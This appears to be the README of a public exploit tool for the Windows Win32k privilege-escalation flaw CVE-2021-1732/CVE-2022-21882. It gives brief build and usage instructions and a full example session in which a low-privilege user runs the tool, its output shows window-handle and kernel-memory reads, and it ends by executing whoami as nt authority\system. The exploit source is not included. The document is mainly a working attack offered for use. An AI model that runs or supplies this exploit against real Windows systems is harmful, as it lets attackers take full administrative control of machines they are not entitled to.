CVE

CVE-2021-1732 / CVE-2022-21882 - The revive of CVE-2021-1732

Win32k Elevation of Privilege Vulnerability. The Win32k elevation of privilege vulnerability was fixed this month as part of the January 2022 Patch Tuesday, it is the result of a bypass for the previously CVE-2021-1732 flaw that allows anyone to gain admin privileges in Windows 10.

Installation

Build your own .exe from source.

Usage

CVE-2021-1732.exe whoami

Examples

Microsoft Windows [Version 10.0.17763.107]
(c) Microsoft Corporation. All rights reserved.

C:\Users\lowpriv> net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
JohnDo
The command completed successfully.

C:\Users\lowpriv> whoami
desktop-qiv0pbc\lowpriv

C:\temp>CVE-2021-1732.exe whoami
CreateWnd
Hwnd:000b014a   qwfirstEntryDesktop=000001966C345110
BaseAddress:000001966C345000   RegionSize=:000000000001A000
Hwnd:00050406   qwfirstEntryDesktop=000001966C3431C0
BaseAddress:000001966C343000   RegionSize=:000000000001C000
Hwnd:000903b2   qwfirstEntryDesktop=000001966C342A20
BaseAddress:000001966C342000   RegionSize=:000000000001D000
Hwnd:000300d8   qwfirstEntryDesktop=000001966C342B70
BaseAddress:000001966C342000   RegionSize=:000000000001D000
Hwnd:0013016c   qwfirstEntryDesktop=000001966C341B90
BaseAddress:000001966C341000   RegionSize=:000000000001E000
Hwnd:00050414   qwfirstEntryDesktop=000001966C341CE0
BaseAddress:000001966C341000   RegionSize=:000000000001E000
Hwnd:0005017c   qwfirstEntryDesktop=000001966C341E30
BaseAddress:000001966C341000   RegionSize=:000000000001E000
Hwnd:000502da   qwfirstEntryDesktop=000001966C356830
BaseAddress:000001966C356000   RegionSize=:0000000000009000
Hwnd:00020384   qwfirstEntryDesktop=000001966C356980
BaseAddress:000001966C356000   RegionSize=:0000000000009000
Hwnd:000203ac   qwfirstEntryDesktop=000001966C356AD0
BaseAddress:000001966C356000   RegionSize=:0000000000009000
Min BaseAddress:000001966C341000   RegionSize=:000000000001E000
realMagicHwnd=00000000000303AC
Free ExtraBytes:000000000000124D
set ExtraData == 00000000000431C0
Free ExtraBytes:000000000000124D
dwRet=000000000000FA90
tagWndMin_offset_0x128=000000000000FA90
g_qwvuln=FFFFB73700826960
qwFrist read=FFFFB73700831E70
qwSecond read=FFFFC98914160810
qwSecond read=FFFFB73701A00000
qwFourth read=FFFFB737017F8010
qwFifth read=FFFFC989207F2080
qwSixth read=FFFFC98921421300
[*] Trying to execute whoami as SYSTEM
[+] ProcessCreated with pid 11296!
===============================
nt authority\system

URL list